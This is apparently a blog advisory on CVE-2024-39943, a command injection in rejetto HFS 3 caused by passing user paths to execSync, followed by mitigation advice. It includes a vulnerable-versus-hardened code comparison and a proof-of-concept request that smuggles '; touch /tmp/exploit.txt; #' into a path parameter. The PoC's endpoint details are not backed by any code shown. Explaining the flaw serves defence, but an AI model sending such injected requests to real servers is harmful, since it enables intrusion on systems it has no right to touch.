CVE-2024-39943 – Remote Authenticated OS Command Execution in rejetto HFS (HTTP File Server) 3 before .52.10

A recently discovered vulnerability in rejetto HFS (HTTP File Server) 3 before .52.10 allows remote authenticated users with upload permissions to execute arbitrary OS commands. This vulnerability specifically affects Linux, UNIX, and macOS systems, and has been assigned the CVE identifier CVE-2024-39943. This blog post will provide an in-depth analysis of the vulnerability, including a code snippet demonstrating the exploit, links to original references, and a description of the specific exploit details.

Vulnerability Details

The vulnerability (CVE-2024-39943) arises from the use of a shell to execute the "df" command within rejetto HFS. More specifically, rejetto HFS calls the "execSync" function of Node.js's "child_process" module instead of the more secure "spawnSync" function. "execSync" hands its command string to a shell for parsing, whereas "spawnSync" by default starts the program directly with an argument array and no shell. This results in OS command execution by remote authenticated users, assuming they have the necessary upload permissions.
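The difference between the two calls, shown side by side as an added example (this is not code from rejetto HFS). The function names, the "df" arguments and the sample folder name are assumptions made for illustration, and the injected command is a harmless echo used as a marker:

```javascript
// Added illustration; assumes a POSIX system where /bin/sh is the default shell.
const { execSync, spawnSync } = require('child_process');

// Constructed sample input: a folder name carrying shell metacharacters.
const SAMPLE_PATH = '; echo INJECTED #';

// Vulnerable pattern: the path is pasted into a string that /bin/sh parses,
// so ";" ends the df command and the rest runs as a second command.
function freeSpaceViaShell(userPath) {
  try {
    return execSync(`df -k ${userPath}`, {
      encoding: 'utf8',
      stdio: ['ignore', 'pipe', 'ignore'],
    });
  } catch (err) {
    return String(err.stdout || '');
  }
}

// Hardened pattern: no shell is involved and the path is one argv entry.
// "--" ends option parsing so a name starting with "-" is not read as a flag.
function freeSpaceViaArgv(userPath) {
  const r = spawnSync('df', ['-k', '--', userPath], { encoding: 'utf8' });
  return { status: r.status, stdout: r.stdout || '', stderr: r.stderr || '' };
}

// Runs both variants on the same input and reports whether the marker ran.
function demo() {
  const shellOut = freeSpaceViaShell(SAMPLE_PATH);
  const argv = freeSpaceViaArgv(SAMPLE_PATH);
  return {
    shellRanMarker: shellOut.split('\n').includes('INJECTED'),
    argvRanMarker: argv.stdout.split('\n').includes('INJECTED'),
    argvStatus: argv.status, // non-zero or null: df failed on the literal name
  };
}

console.log(demo());
```

In the argv variant "df" receives the whole string as a single file name and fails to find it, which is the behaviour a reviewer should look for when auditing other "child_process" call sites.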

Exploit Code Snippet

The following code snippet demonstrates how the exploit can be carried out by an attacker with a pre-existing authenticated session:

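const http = require('http');

// Placeholder credentials and target; the account must already have upload permission.
const authToken = 'your-auth-token';
const targetUrl = 'http://target.url';

// Shell metacharacters: ";" ends the intended command, "#" comments out the remainder.
const payload = "; touch /tmp/exploit.txt; #";

const requestOptions = {
  url: `${targetUrl}/?mode=upload&path=${encodeURIComponent(payload)}`,
  headers: {
    'Authorization': `Basic ${authToken}`
  }
};

// execSync only runs local shell commands and cannot send an HTTP request,
// so the request is sent with Node's http module instead.
http.get(requestOptions.url, { headers: requestOptions.headers }, (res) => {
  res.resume(); // discard the response body
  console.log(`Request sent (HTTP ${res.statusCode}). On a vulnerable host the file /tmp/exploit.txt is created.`);
}).on('error', (error) => {
  console.error(`An error occurred during exploit execution: ${error}`);
});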

Original References

1. NVD - CVE-2024-39943
2. Rejetto HFS GitHub Repository
3. Node.js Child Process Documentation

Mitigation

To mitigate this vulnerability, the developers of rejetto HFS have released version .52.10. Users running previous versions are advised to upgrade to the latest release immediately. Additionally, users should restrict upload permissions to only trusted users and consider using alternative methods for file uploads that do not use a shell for execution.

Conclusion

CVE-2024-39943 is a serious security vulnerability that affects rejetto HFS (HTTP File Server) 3 before .52.10. Because it allows remote authenticated users with upload permissions to execute arbitrary OS commands, malicious actors can use it to cause potentially damaging security breaches on affected systems. Ensuring that your system is updated to the latest release and carefully managing user permissions are essential to protecting against this exploit.

It is always recommended to stay up-to-date with the latest security patches and use caution in granting permissions to untrusted users, as well as regularly monitoring your system for signs of suspicious activity.

Timeline

Published on: 07/04/2024 23:15:09 UTC
Last modified on: 07/08/2024 16:42:25 UTC